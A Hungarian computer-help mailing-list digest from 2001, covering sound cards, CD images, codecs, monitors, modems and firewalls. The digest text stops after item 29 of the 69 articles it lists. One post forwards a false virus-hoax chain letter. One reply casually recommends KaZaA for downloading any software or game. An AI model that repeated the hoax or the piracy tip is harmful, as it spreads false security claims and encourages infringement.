Hollosi Information eXchange /HIX/
HIX GURU 2483
Copyright (C) HIX
2001-11-29
Új cikk beküldése (a cikk tartalma az író felelőssége)
Megrendelés Lemondás
1 [DOS] Clipper 5.3 kontra Asus (mind)  21 sor     (cikkei)
2 [WINDOWS] Re: SB128Pci (mind)  24 sor     (cikkei)
3 Re: *.bin (mind)  19 sor     (cikkei)
4 [WINDOWS] Re: vinyon levo adatok titkositasa (mind)  29 sor     (cikkei)
5 Re: Direct Cd help (mind)  15 sor     (cikkei)
6 Re: Kaspersky AV adatbazis frissites (mind)  20 sor     (cikkei)
7 Re: Parancsoljon kedves Uram, faradjon beljebb (mind)  16 sor     (cikkei)
8 Re: *.bin (mind)  19 sor     (cikkei)
9 Re: MPEG2, MPEG1, Divx (mind)  31 sor     (cikkei)
10 Re: Zonealarm (mind)  16 sor     (cikkei)
11 Re: Monitor kerdes (mind)  20 sor     (cikkei)
12 17-es monitor megeri? (mind)  13 sor     (cikkei)
13 90 perces CD-irasa mivel-hogyan? (mind)  6 sor     (cikkei)
14 Re: [WINDOWS] Pilot-comp akcios ajanlat (mind)  12 sor     (cikkei)
15 [TELEFON] [Elender vs inter.net] and [Internet hasznalat statiszt (mind)  43 sor     (cikkei)
16 [LINUX] linux ISDN (mind)  32 sor     (cikkei)
17 bocs ha hosszu, remelem csak paranoia ! (mind)  44 sor     (cikkei)
18 [TELEFON] Toshiba laptophoz cuccok (mind)  16 sor     (cikkei)
19 [WINDOWS] Athlon XP kerdes (mind)  44 sor     (cikkei)
20 [TELEFON] AMR (mind)  55 sor     (cikkei)
21 Re: =?UNKNOWN?Q?K=E9t_g=E9p_=F6sszek=F6t=E9se?= (mind)  21 sor     (cikkei)
22 Outlook (mind)  8 sor     (cikkei)
23 Re: [TELEFON] vege a joletnek (mind)  17 sor     (cikkei)
24 MX400 vs Abit BH6 (mind)  11 sor     (cikkei)
25 vonalkod (mind)  13 sor     (cikkei)
26 Re: ZoneAlarm (mind)  19 sor     (cikkei)
27 re: s-video kerdes (mind)  17 sor     (cikkei)
28 Re: *.bin (mind)  13 sor     (cikkei)
29 Re: cool desk crack (mind)  7 sor     (cikkei)
30 Re[2]: HW Video encoder valaszok (mind)  28 sor     (cikkei)
31 Re[2]: ADSL stb (mind)  17 sor     (cikkei)
32 Re: Explorer =?UNKNOWN?Q?megnyit=E1sa?= nagy ablakban? (mind)  16 sor     (cikkei)
33 Re: #2451 low disk space (mind)  15 sor     (cikkei)
34 Jajj, az egerem! (mind)  11 sor     (cikkei)
35 Jaj, a monitorom! (mind)  18 sor     (cikkei)
36 Re: HW Video Encoder valaszok (mind)  10 sor     (cikkei)
37 Re: Kerdes (mind)  18 sor     (cikkei)
38 Funny stuff !! (mind)  125 sor     (cikkei)
39 LG 52x lassitasa (mind)  23 sor     (cikkei)
40 levelelleklet (mind)  13 sor     (cikkei)
41 Re: levelezo (mind)  17 sor     (cikkei)
42 [TELEFON] Re: IntraCom NetMod (mind)  13 sor     (cikkei)
43 Re: S-VIDEO kerdes (mind)  10 sor     (cikkei)
44 [WINDOWS] Hatha valaki nem ismeri :-) (mind)  83 sor     (cikkei)
45 RE: levelezo (mind)  28 sor     (cikkei)
46 Re: SMS Kapcsoltam - segitseg! (mind)  15 sor     (cikkei)
47 Re: cool desk crack (mind)  15 sor     (cikkei)
48 Re: pdf to doc (mind)  17 sor     (cikkei)
49 Re[2]: HW Video encoder valaszok (mind)  20 sor     (cikkei)
50 Re: Miert nem kapok guru-t? (mind)  11 sor     (cikkei)
51 Re: [DOS] HD Backup (mind)  10 sor     (cikkei)
52 bios frissitese (mind)  13 sor     (cikkei)
53 Power, Sleep, Week UP (mind)  16 sor     (cikkei)
54 Re: =?UNKNOWN?Q?K=E9t_g=E9p_=F6sszek=F6t=E9se?= (mind)  28 sor     (cikkei)
55 important update (mind)  55 sor     (cikkei)
56 TV-Out kezelo progi kellene (mind)  17 sor     (cikkei)
57 [WINDOWS] Re: vinyon levo adatok titkositasa (mind)  22 sor     (cikkei)
58 [DOS] Re: vinyon levo adatok titkositasa (mind)  11 sor     (cikkei)
59 [TELEFON] re: Gepvasarlas (mind)  33 sor     (cikkei)
60 re: *.bin (mind)  19 sor     (cikkei)
61 [WINDOWS] re: Re: XP es a driverei? (mind)  28 sor     (cikkei)
62 CD printer (mind)  13 sor     (cikkei)
63 Re: pdf to doc (mind)  17 sor     (cikkei)
64 Double Your Life Policy No Xtra Cost 3046 (mind)  115 sor     (cikkei)
65 [DOS] AC 97 DOS-ban (mind)  7 sor     (cikkei)
66 Re: Re[2]: enternet adsl (mind)  11 sor     (cikkei)
67 Re: Pmail forwarding (mind)  38 sor     (cikkei)
68 [HIRDETES] UD polo (mind)  8 sor     (cikkei)
69 [HIRDETES] elado Lexmark Z12-es szines nyomtato (mind)  6 sor     (cikkei)

+ - [DOS] Clipper 5.3 kontra Asus (mind) VÁLASZ  Feladó: (cikkei)

Udv!

ASUS Cuple-VM 100 MHz, Celeron 800MHz ,es VIA VT8361 Graph. Controller,
vagyis alaplapra integralt monitorcsatolo (is).

Egy CLS, @...GET, READ, QUIT Clipper 5.3 -as progi futtatasa utan  - DOS
ablakban -
a kurzor a minuszjel magassagaba all be a DOS prompt-nál.
Ha ezutan pl. a Norton Comm.-ot inditom, akkor az egesz kep megnyulik,
lemegy a monitor
" alá ", mintha A4-es  monitor lenne. Csak a Display.sys... (ega,,1)  van
beallitva, semmi mas.
Vissza kell lepni a Win -be, hogy rendezodjon.

Mindezt Clipper 5.01- el  _nem csinalja.

Kernek a jelenseg ellen valami  5letet, ha van. Mi nem fer itt ossze ?


TIA
Andor
+ - [WINDOWS] Re: SB128Pci (mind) VÁLASZ  Feladó: (cikkei)

Hello Guru,

> Sziasztok Guruk!
> Nem tudjatok veletlenul, hogy miert van az, hogy kicsereltem
> egy SB 16 ISA hangkartyat egy SB 128 PCI -re es az utobbi
> sokkalta halkabb mint az elobbi. Nem tudtok valamit
> segiteni, hogy miert an ez, hogy lehet kikuszobolni ?
> Elore is koszi Kari
> 
> abit KT7E
> AMD 750
> 128 MB RAM

szoval nekem is volt ilyen, es hat vicces, de nem a hangkartya a
ludas, hanem a driver, az eddigi leggyengebb hangerot produkalo az a
legfrissebb ME-s driver, de most XP-n a legujabb XP-s driverrel
leszedi az AKG-t a fejemrol  :)

ha ME-d van, rakj fel egy ezereves Win95 drivert, ha 95/98 van
akkor is

-- 
Best regards,
 Tackey                          mailto:
+ - Re: *.bin (mind) VÁLASZ  Feladó: (cikkei)

Hello Guru,

> Hello
> 
> Tudja-e valaki milyen filet takarhat a *.bin kiterjesztes? A filemerete =
> kb. 1 CD -nyi es ezt melekelik hozza: FILE "DVNDRCOP.BIN" BINARY, TRACK =01
> MODE2/2352, INDEX 01 00:00:00. Mivel lehet ezt megnyitni?
> 
> legyetek szivesek maganba is )
> 
> roland

    :)))))

    hat CD image, asszem CDRWin-el megy a *.bin

-- 
Best regards,
 Tackey                          mailto:
+ - [WINDOWS] Re: vinyon levo adatok titkositasa (mind) VÁLASZ  Feladó: (cikkei)

Hello Guru,

> Hello ,
> 
> Szeretnem a vinyom adatait titkositani es erre egy megoldast talaltam
> a particios tablat kellene lekodolni.
> Nehany ujabb alaplapon van egy ugynevezett harmas Smart Key-es
> biztonsagi rendszer. Amihez kell egy jelszo es a hozza adott hardverkulcs
> tud valaki errol bovebbet? Ha kiveszem belole a vinyot es atdobom egy
> masik gepbe akkor mit er?
> Hallottam valamikor regen egy olyan kartyarol amin keresztul aramoltak
> az adatok az alplaprol a vincseszterre es kozben titkositotta, ilyet
> lehet venni valahol? Ha kivetted a kartyat vagy a vinyot masik gepbe
> tetted csak kusza osszevisszasagot mutatott.
> Tehat a lenyeg hogy mar a bootolas elott kerje a jelszot es
> masik vinyorol bebootolva se lassanak rajta ertelmezheto adatokat.
> Lehetseges ilyen?
> A WinXP-n is van titkositas tudtommal ha NTFS-re teszed fel ezt hasznalja
> valaki?

XP-n a dolog ugy mukodik, hogy nyomsz egy konyvtarra, vagy csak egy
file-ra egy Properties-t, es ott kivalasztod, hogy Advanced, s azon
belul raksz egy pipat, hogy encrypt. De az NTFS install eseten itt
olyan is lesz, hogy Compress, es akkor azokat a file-okat valojaban
tomoritve tarolja.

-- 
Best regards,
 Tackey                          mailto:
+ - Re: Direct Cd help (mind) VÁLASZ  Feladó: (cikkei)

Hello Guru,

> Hi
> Tudsz letoltheto DirectCD 5-ost?
> kosz
> Geza
> 
> (webes bekuldes, a bekuldo gepe: proxy.enternet.hu)

toltsd le a KaZaA Media Desktop pl. a download.cnet.com file sharing
reszerol, es azzal minden hulye programot meg jatekot le tudsz tolteni

-- 
Best regards,
 Tackey                          mailto:
+ - Re: Kaspersky AV adatbazis frissites (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2480-ban irta :
> Sajnos a hozza adott
>virus adatbazis eleg regi, frissiteni kellene a netrol. Es itt van a bibi.
A
>Chip magazin allitasaval ellentetben en azt talaltam (az elmult harom
>ejszakai probalkozasom alatt), hogy a sajna nagyon lassuak a megadott web
>helyek. Meg a magyar oldal is kritikatlanul lassu. Orakba telt volna amig
>legtoltom a friss adatbazist.
Ez csak az elso alkalommal van igy, mert valoban nagyon regi az adatbazis.
Ha megszerezted az ujat akkor alitsd be a programnak, hogy pl. 10 naponkent
frissitse a bazist akkor szinte villamgyors.

udvozlettel

Csonka Ferenc - ferke
www.adanet.co.yu/~ferke/rogoznica

HIXEditor 1.15beta7

Ui.: Ment maganba is
+ - Re: Parancsoljon kedves Uram, faradjon beljebb (mind) VÁLASZ  Feladó: (cikkei)

:

> *** Nincs olyan technologia, mellyel 100%-os biztonsaggal meg 
> lehetne mondani, hogy egy Router, NAT stb. mogott hany gep van, 
> vagy hogy egyaltalan 1-nel tobb van e.***

Hoppa! En nem errol beszeltem. Az eredeti kijelentest (tuti hogy nem
latszik kivulrol) en ugy ertelmeztem hogy 100%os sikerrel el lehet
rejteni. Es erre mondtam hogy nem.

Mivel a "nem lehet 100%-os sikerrel elrejteni" nem azt jelenti hogy
"100%-os sikerrel detektalni lehet" (lasd peldaul orvosi szurovizsgalat:),
gond nincs egy szal sem. (Hacsak annyi nem hogy elbeszeltunk egymas
mellett).

Udv, Sandor
+ - Re: *.bin (mind) VÁLASZ  Feladó: (cikkei)

Hello,

> Felado :  [International]
> Temakor: *.bin ( 9 sor )
> Idopont: Sun Nov 25 17:10:58 CET 2001 GURU #2480

> Tudja-e valaki milyen filet takarhat a *.bin kiterjesztes? A filemerete =
> kb. 1 CD -nyi es ezt melekelik hozza: FILE "DVNDRCOP.BIN" BINARY, TRACK
> =01 MODE2/2352, INDEX 01 00:00:00. Mivel lehet ezt megnyitni?

CDRWIN. Egy BIN fajl+egy CUE fajl. CUE-t kell megnyitni a 
progibol es a BIN-t irja meg. Ha a CUE rossz helyre mutat, akkor 
szerkeszteni kell a benne levo eleresi utat.

A szoftver shareware modban 1x-es sebesseggel tud irni.

Udv,

awender
+ - Re: MPEG2, MPEG1, Divx (mind) VÁLASZ  Feladó: (cikkei)

Hello,

> > Azert ennel majd gondolj bele, hogy az MPEG-2 fajlmerete megfelelo-e
> > neked.. nem tul nagy-e... Szerintem az MPEG-1 boven eleg.
> Valaki vilagositson mar fel, ha tevedek. En ugy tudom, hogy ha ket
> filmet azonos minosegben digitalizalnak be, akkor ezek kozul az MPEG-2
> lesz rovidebb (emiatt is kell nagyobb szamitasi teljesitmeny az MPEG-2
> lejatszashoz, mert bonyolultabb a tomoritesi algoritmus). Az teny, hogy

Ez igy van. Az eredeti level iroja tevedett. Bar vannak specialis 
esetekben kivetelek, ezek annyira szorvanyosak, hogy nem 
elemeznem oket.

> ugyanaz a film DiVX-ben rovidebb, mint mpg-ben, es tudtommal a DiVX az
> MPEG-2-vel mutat szorosabb rokonsagot.

Divx az MPEG4-re epito technologia. Meg nagyobb proci igeny, 
meg kisebb meret.

> Ha jol tudom, a DVD-n csak az extra dolgok (felirat, kameraallasok, stb.)
> miatt foglalnak el nagyobb helyet a filmek.

Feliratsavok, AC3 hangsavok, sztereo hangsavok. Hogy ne kelljen 
ugralnia a DVD fejnek, ezert ezek folytonosan vannak egetve a 
DVD-re, nincs kulon AC3 hang, felirat fajl stb, hanem egy fajlban 
vannak, un. VOB-okban. Ezeket a VOB-okat altalaban 1G-s 
darabokra vagdossak, ugy rakjak fel.

Udv,

awender
+ - Re: Zonealarm (mind) VÁLASZ  Feladó: (cikkei)

Hello,

> Felado :  [Hungary]
> Temakor: ZoneAlarm ( 8 sor )
> Idopont: Mon Nov 26 13:54:56 CET 2001 GURU #2481
>     A kerdesem : a ZoneAlarmnak mik a hardveres igenyei? Mennyire lassitja
> le az oprendszer mukodeset? Esetleg tapasztalatok is erdekelnenek.

En nem vettem eszre lassulast. Tobbszor teszteltem vele az 
atviteli sebessegeket, de lassulast nem vettem eszre rajta. Az 
ATGuard nekem jobban tetszett kezelofelulet es hasznalhatosag 
teren, de ez gusztus dolga.

Udv,

awender
+ - Re: Monitor kerdes (mind) VÁLASZ  Feladó: (cikkei)

Hello,

> Felado :  [Hungary]
> Temakor: Monitor kerdes ( 11 sor )
> Idopont: Tue Nov 27 21:53:23 CET 2001 GURU #2482
> Fontos dontes ele allitottak: haver ram akar sozni egy monitort : 19"-es
> Likom.4 honapos, meg 2,5 ev gari van ra es 70kHUF-t ker erte.Az a kerdesem
> hogy van -e valakinek ilyen moncsija?, mi a velemenye rola?, megeri -e ezt
> a penzt?

Akar haver akar nem, meg kell tudni, hogy miert adja el. Az, hogy 
garancia van ra, sok esetben nem tul vigasztalo, mert csak 
bizonyos karokra vonatkozik. Ha haver csinalt vmi csunyat vele, 
akkor a problema akar 1 ev mulva is jelentkezhet. Ha urge 
megbizhato, akkor csak akkor eri meg, ha legalabb 20%-al 
olcsobban adja, mint a mostani bolti ar.

Udv,

awender
+ - 17-es monitor megeri? (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok

Gondolkozom egy 17-es monitor vasarlasan.
konkretan ezen: Samsung SAMTRON 76E
namarmost itt helyben (videken) 63.000 arat mondtak a hetvegen, de a
Tesco-ban 57-ert lattam
a hetvegen. MA meg nezem a DEpo-ban
brutto: 54.999
Most akkor mivan esik az ara?...

varom hozzaertok tanacsait...

BReki
+ - 90 perces CD-irasa mivel-hogyan? (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok

A hetvegen vettunk a TESCO-ban 90 perces (800)
megas CD-t
Ezt meg tudom LG-iróval irni?
a Nero 703 megasnak latja
+ - Re: [WINDOWS] Pilot-comp akcios ajanlat (mind) VÁLASZ  Feladó: (cikkei)

Kedves Gurusok!


Hol lehet ez ellen a spammer banda ellen panaszt tenni?
Nagyon unom mar oket :(

>
>Amennyiben nem kivanja, hogy rovid terjedelmu, a jelenlegihez hasonloan kis me
r
>etu hirlevelunk reven, ketheti gyakorisaggal akcios ajanlatainkrol tajekoztass
u
>
+ - [TELEFON] [Elender vs inter.net] and [Internet hasznalat statiszt (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok...

Sajnos ujabb segitseget kell kernem toletek, aktiv internet
felhasznaloktol ....

Keresnem azokat akik 2000 december, 2001 januar 2001 februar honapokban
aktiv felhasznalok voltak az Elender, vagyis most mar az inter.net
(interdotnet) internet szolgaltatonal.

Az emlekeim szerint az isz az alabbi kedvezmenyeket biztositotta a
nagyerdemu kozonsegenek.

Hetkoznap 18,00-tol 24,00-ig es masnap 00,00-tol 06,00 ig dijmentes
internet eleres
Hetvege     15,00-tol 24,00-ig es masnap 00,00-tol 06,00 ig dijmentes
internet eleres

Az mweber emlekei igen csak erossen mulandoak, de ezzel szemben most mas
kedvezmenyeket emlegetnek a cegnel..

Szoval keresnem azokat az "Elender" felhasznalokat, akik latogattak a
cegnek a felhasznalt idot nyilvantarto oldalat, es le is mentettek a
feni honapi statisztikajukat

Nekem csak az oldal fejlece kellene, amiben oda vagyon irva a
kedvezmenyezett idoszak pontosan.

A kerdeses honap nalam a 2001 januar az akkori kedvezmenyekre lenne
szuksegem.

Nem nagy osszegrol van szo, ki fogtok nevetni, de akkor sem szeretnem
befizetni azt az 1000 ft+afa osszeget.

Mellesleg megjegyzem a ceg telefonszamlaja, mar boven tulhaladta az
emlitett osszeget, de ugy latszik valakin egyszer mar peldat szeretnenek
statualni....
Na jo, legyen, de miert rajtam ?? :-)))
Nekem nem volt annyi eszem hogy elmentsema felhasznalt idot, honaprol
honapra.
Abban bizom hogy itt, a GURU-k kozott van nalam okosabb ember is ;-))))


Sziasztok, Segitsegeteket elore is koszonom Csaba
+ - [LINUX] linux ISDN (mind) VÁLASZ  Feladó: (cikkei)

hali
lenne egy kérdésem:
Suse Linux 7.2 alá hogyan lehetne installálni a matavos 
ISDN NT-t? (intracom: NetMod)
a forgalmazotol is kertem mar segitseget de eddig ertelmes 
dolgot nem talaltam Tulajdonkeppen most ismerkedek még a 
Linuxszal,  ez az elso. gond nélkül felismert minden HW-t, 
csak ezt nem. Azt szepen leirtak nekem, hogy a com portot 
hogyan kell abajgatni, de mivel sem plug&pay, sem listabol 
kiválaszva nem sikerült, es alalános 28-as modemet sem 
talaltam, ahogy windows alá kell, igy tanácstalan vagyok...
 
2. kerdes, vetem két (ST Lab) halokártyat, Win ME alatt 
egyidejuleg ugyanugy felraktam, es az egyik gepen frankon 
muködik, a masikon sem jelez semmi problemat, (32 bit 10 
Mode PCI Ethernet adapter) de amikor a halozatra megyek ra 
akkor atz irja, hogy "nem lehet tallozni a halozaton. A 
windows nem fer hozzá a halozathoz..." kerdezzem a sugot 
azzal meg nem megyek semmire...
nincs valakinek valami ötlete hogy mi lehet a gond? 
(mindket kartya muködik a masik gepen, tehat ez kizárva...)
eddig meg nem probáltam halot epiteni, szal ez az elso, így 
lehet hogy valami benaság?, de nem jövök ra mi az...
(azota kiprobaltam hogy az elso gepen win XP, a masikon ME 
ugy mukodott. De az XP nem magyar...)
elore is köszi a segítseget!
 Cydor
icq: 103592008 mailto: 
PS:
a V-Net (magyarul vivendi) megturi, hogy egyszerre tobben 
hasznaljak ugyanazt a logint, akar kulon telefonszamrol is, 
legalabbis eddig igy volt...
+ - bocs ha hosszu, remelem csak paranoia ! (mind) VÁLASZ  Feladó: (cikkei)

F I G Y E L E M ! ! !

Adjátok tovább ismerőseiteknek
48 órán belül egy új vírus kerül a forgalomba, amit a 
MICROSOFT éppen most tett közzé. Ha e-mailt kapsz 
valakitol, lehet ismeretlen vagy ismeros is, aminek a 
tárgya HELP, ne nyisd meg, rá se menj egérrel, ne
próbáld meg letörölni, mert ezek az egyszeru dolgok 
beindítják a vírus muködését! 48 órát kell várni, és csak 
azután lehet letörölni. Ha elobb próbálod, a vírus 
automatikusan muködésbe lép és letörli az összes adatot a
merev lemezrol, az operációs rendszerhez pedig nem enged 
hozzáférni!

NAGYON FONTOS
mindenkinek továbbítani az üzenetet akinek meg van az e-
mail címetek!
Köszi

Illés Szilárd
rendszergazda
Crow Holdings Magyarország Kft.
Tel: 06-20-9545-015
Fax: 4514-970
E-mail: 
http://www.harborpark.hu
2001.11.26.

************************************************************
**********
The information contained in this message or any of its 
attachments may be confidential and is intended for the 
exclusive use of the addressee(s). Any disclosure, 
reproduction, distribution or other dissemination or use of 
this communication is strictly prohibited without the 
express permission of the sender. The views expressed in 
this email are those of the individual and not necessarily 
those of Sony or Sony affiliated companies. Sony email is 
for business use only.

This email and any response may be monitored by Sony UK.
(6)
************************************************************
**********
+ - [TELEFON] Toshiba laptophoz cuccok (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok!

Az lenne a kerdesem, de piszkosul kellene a segitseg, mert 
nem akarom korbejarni a varost, hogy nem tud e valaki 
Budapesten olyan bontot, ahol laptophoz arulnak cuccokat. 
Van egy viszonylag uj Toshiba laptopom, es ahhoz kellene 
tolto (15V/2A), ill. egy atalakito, ami a PCMCIA modem/lan 
kartyaba valo. Ezek meg tokeletesen megfelelnenek 
hasznaltan is, 



Koszi a segitseget.



+ - [WINDOWS] Athlon XP kerdes (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok

Nemregen vette, egy uj gepet, a konfig a kovetkezo:

AMD Athlon XP 1800+
Epox 8KHA+
Abit Geforce2 MX400 64MB AGP TV out
256 MB Samsung PC2100
Globalwin WBK38
Seagate Barracuda IV. ATA100 40 MB 7200 RPM
Quantum ATA100 10 MB 5400 RPM
Quantum ATA66 4.5 MB 5400 RPM

Mindezen Windows XP ketyeg.
No, most.
A proci homerseklete az alapon, tehat 133 Mhz-s FSB nel, alap
feszultsegbeallitasoknal melo nelkul, cca 32 C fok, az AMD procihomeroje
szerint.
Ha dolgozom rajta, es brutalisan megdolgoztatom a procit - ahogy
szoktam:-)) - akkor ez felmegy cca 45 C fokra.
Ha felemelem az FSB-t 148 Mhz re(1702 Mhz), akkor, atlagos hasznalat
mellett, a rendszer stabil, a homerseklet sem zavaro.
Megis, amikor belekezdek 1 jatekba, akkor a terheles miatt a homerseklet
felmegy, semmi gond a jatekkal, amde amikor kilepek belole, akkor nem a
rendszerbe lep ki, hanem egy teljes Restart indul...
Azt hittem, hogy ez azert van, mert megiscsak nem birja mar ezt a
megterhelest....de akkor miert nem csinalja ezt a kritikus ponton, jatek
kozben, miert csak a kilepeskor??
Kivancsisagbol visszavettem az alapra a gepet, mind feszultsegben mind MHz
ben, de lass csudat, akkor is ugyanez a jelenseg all fenn...
Mi lehet ennek az oka???
Es egy masik kerdes:
Hogyan lehet a Windows XP-ben "sort" olni a programs csoportban levo
progikat? Tehat, hogy ABC sorrendbe rendezodjenek? Mert ha "classic style"
ba valtok, akkor lehet, de az "XP style" nal nem talalok ilyen lehetoseget..
Lehet, hogy ezt az "XP style" automatikusan csinalja, mert amikor
telepitettem a programokat az elejen, akkor automatikusan ABC sorrendbe
kerultek, viszont egyszercsak abbahagyta ezt...Mit lehet tenni??
A segitseget elore is koszi, johet maganba, a listara, de akar napilapokba
is, mindent olvasok:-))

Fotiszteletem

Voland
+ - [TELEFON] AMR (mind) VÁLASZ  Feladó: (cikkei)

>Hetek ota probalom szora birni az AMD procis gepem
>AMR1 jelu portjaba csatlakoztatott belso modemet.

Szia!

Ugyanilyen dolog miatt szivtam az egyik ismerosom uj
gepevel. En sem hallottam elotte az AMR-rol...Ja, az
alaplap Amaze Via 693.
Az o gepere ok otthon felraktak a win98-at, meg ami kell,
es a gephez adott 5 honap internet elerest, és a mailt kellett
volna beallitanom. Akkor meg nem tudtam, hogy AMR
modem, csak azt, hogy belso. Nekem is belso van, de az
PCI-os. Ez azt csinalja, mint irtad is, hogy virtualis COM3
(vagy4) portot pakol fel es o azon keresztul kommunikal.
Az eddigi tapasztalatok alapjan kerestem a telepito CD-n
egy setup szeru exe-t, elinditottam ,de nincs modem (vagy
valami ilyesmi) hibauzenettel leallt. Nosza, rakjuk fel a
vezerlopultbol uj hardverkent, driverek ok, fel is telepult,
de nem tudtam konfiguralni. Kezzel csak a COM1-2 re
lehet, de az nem jo, automatice meg nem akart jo lenni.
Hivtuk telefonon a ceget, mondja, hogy ez AMR modem,
es engedelyezni kell a BIOSban, es ugy telepiteni. Na,
mondom jo hulye vagyok... A BIOSban keresve nincs
AMR-hez kapcsolodo beallitas, de van egy OnCHIP
modem amit enable-zni lehet, hurra!! Ujra a telepites, fel is
megy, de tarcsazni nem enged, mert nincs kommunikacio a
modemmel...na, szep! Modem/diagnosztika: nincs kommunikacio
a modemmel. Telefon ujra..hat ha nagyon nem megy vigyuk be a
gepet. Be is vittuk, es kerdeztem, hogy nem lehet, hogy rossz ez a
modem? Az biztos, hogy jo! Nyugtattak meg. A srac magabiztosan
elkezdte ott elottunk buheralni a beallitasokat, driver le, driver
fel,
BIOS, IRQ szetbombaz, ujra beallit, meg minden. Par perc mulva
mar kezdett izzadni, es kerdeztuk, hogy visszajojjunk, mert van
dolgunk? Beleegyezett.
A megbeszelt idore visszamentunk, a gep oldala leszedve, a srac
haja az egnek allt, de a szeme mar megnyugtatoan csillogott.
Neztem mit csinalt, es lattam, hogy a modem diagnosztika azt mondja:
Oke.
Es csak most jon a megoldas amit  mondott:
Az alaplapon AC97 hangkutyu volt, es 2 driver van hozza, ami win98
alatt mukodik, de az egyik kiutotte az AMR modemet, lecserelte a
drivert a masikra es azota megy minden (majdnem, most az USB jatszza
azt, hogy egyik nap megy az USB nyomtato, masik nap mar nem...).
De mivel le volt szerelve a gep oldala es nem voltunk ott, azt sem
tudom
kizarni, hogy kicserlete. Egyebkent lattatok mar ilyen AMR modemet?
Van rajta cirka 5-6 ellenallas, meg kondi, valami kis IC is talan,
aztan
slussz. Se rele, se illesztotrafo...hogy kap ez HIF engedelyt?
Szerintem
tutira allandoan terheli a vonalat ...

Udv.
Inhouse
+ - Re: =?UNKNOWN?Q?K=E9t_g=E9p_=F6sszek=F6t=E9se?= (mind) VÁLASZ  Feladó: (cikkei)

hi

a cselloba lehet 2 gepet hasznalni mikozbe csak 1et fizecc ?!?! ezt a kabelesek
 nem komaljak, vagy ? wow :)

de hogy valasz is legyen:
imho a legolcsobb megoldas, ha veszel meg 1-1 halokartyat a te es az oldarborda
d gepibe is (2x3000+sarc) meg 1 crosslink (uhhh, ez is par100huf asszem)kabelt,
 amivel oszekotod majd a vadiuj halokartyaidat, bezizzented oket pl a 192...-es
 reserved iptartomanyba.
ezutan mar csak egy gateway/proxy software kell, amit felinstallsz arra a gepre
 ami a chello-os, a masik gepnek pedig megadod a chellost, mint gatewayt vagy p
roxyt vagy attol fugg mennyire akarod internetethasznalova tenni. arra azert sz
amitsal, hogy bizonyos dolgok nem nagyon fognak menni a belso geppel pl dcc-cha
t-kezdemenyezes/active-ftp :)
najo sokat irtam man aszem...

csa
        n0way

(webes bekuldes, a bekuldo gepe: dial2-11.c3.hu)
+ - Outlook (mind) VÁLASZ  Feladó: (cikkei)

Hi!

Az Outlook Expressben hogyan lehet azt megcsinalni,
h a cimliataban szereplo osszes embernek egyszerre
kuldjek levelet?

Koszi
Panni
+ - Re: [TELEFON] vege a joletnek (mind) VÁLASZ  Feladó: (cikkei)

Hello!

 >>| Januartol megszunnek az atalanydijas kedvezmenyek. Ertesulesunk

 > 1212 szerint ez nem igaz.

1212 mar sokmindent mondott, ritkan igazat. :/
Azon kivul januar elsejetol hatosagi aras lesz a netezes, gondolom
emiatt fog megszunni a 150 forintos kedvezmeny.

 > De amikor kertem, hogy szoljanak az isz.hu -nak, akkor nagyon
 > felhaborodott a kezelo...

Es megis mit mondott? Egyebkent az Index is megirta majdnem
ugyan azt, mint az isz.hu.

LiRul
+ - MX400 vs Abit BH6 (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok!

Van valaki a vonlaban akinek van tapasztalata Abit BH6-os alaplappal 
es Geforece MX400 32/64 MB-os + TV-out-os kartyaval? 
Megy-e a ketto egyutt zokenomentesen win98 ill. 2000-alatt.

Egyekent hasznalhato kartyak ezek?? (beka se**e alatt  levo aruk 
[23 KMFt] miatt erdezem ezt?


Udv: Tony                           mailto:
+ - vonalkod (mind) VÁLASZ  Feladó: (cikkei)

Melyen 10telt Publiqm!

Tudna valaki segedkezni abban, hogy hol lehet lopasjelzot beszerezni? Azt 
hiszem, hogy indukcios elven mukodik a cucc. A boltok (itt elsosorban 
konyvesboltra gondolok) bejaratanal van egy kapu, amin ha atmegyek es 
tiltott cuccot viszek, akkor csipog. A konyvben van egy beragasztott 
valami, amit erzekeli a kapu. Ha jol tudom, akkor olyan is van, ami a 
konyvet azonositani is tudja, nem csak azt, hogy valamit kivittek, amin 
van ilyen jelzo.

Hol lehet ilyenrol doksit olvasni?

EIK && udv From:, a lopott szepseg
+ - Re: ZoneAlarm (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2481-ban irta :
>Hello Guruk!
>
>    A kerdesem : a ZoneAlarmnak mik a hardveres igenyei? Mennyire
lassitja
>le az oprendszer mukodeset? Esetleg tapasztalatok is erdekelnenek.
>    Elore is koszonom :
>    Csaba.
  
 Udvozlettel!
 Ajanlom, hogy ird meg kerdesedet  cimre es korrekt
 valaszt fogsz kapni a Zone Alarmrol. Szereny velemenyem szerint 
 nagyon ismerik minden csinjat-binjat.
  
Laci
mailto:
HIXEditor 1.15beta7

Ui.: Ment maganba is
+ - re: s-video kerdes (mind) VÁLASZ  Feladó: (cikkei)

Hi homer, GURUk!

A GURU 2482-ban irta :
>az a kerdesem, hogy az S-video az hordoz hang informaciot is, vagy
>csak kepit? a masik, hogy max. milyen hosszu lehet egy s-video kabel?

Bar ezt a BME-n es plane a Schonhertzben megtudjak neked mondani ;)
h. az S-video kabelben 2 arnyekolt er van: 1 az vilagosag jelnek (Y) es
1 a kompozit szinjelnek (C), a hangot kulon kell vinni. A hossz a kabel
minosegetol fugg en lattam 10m-est is (nem volt szemmel lathato minoseg
romlas a 1m es a 10m kozott).

--
Tovabbi jo GURUlast: Tivadar
HIXEditor 1.15beta7

Ui.: Ment maganba is
+ - Re: *.bin (mind) VÁLASZ  Feladó: (cikkei)

HIX GURU #2480, :
>Tudja-e valaki milyen filet takarhat a *.bin kiterjesztes? A filemerete =
>kb. 1 CD -nyi es ezt melekelik hozza: FILE "DVNDRCOP.BIN" BINARY, TRACK =01
>MODE2/2352, INDEX 01 00:00:00. Mivel lehet ezt megnyitni?

Porba cseresznye:
http://www.cdgrab.hu/stuff/software/isobuster/isobuster0995final.zip 
~500k

Udv,
		/-/unter			-[HE 1.15beta7;]-
"WinErr: 003 Unexplained error - Please tell us how this happened"
[MMI MLI]
+ - Re: cool desk crack (mind) VÁLASZ  Feladó: (cikkei)

HIX GURU #2480, :
>tudom nem egy etikus dolog itt kerdezoskodni crack-ek utan

Akkor ne tedd.

Udv,
		/-/unter			-[HE 1.15beta7;]-
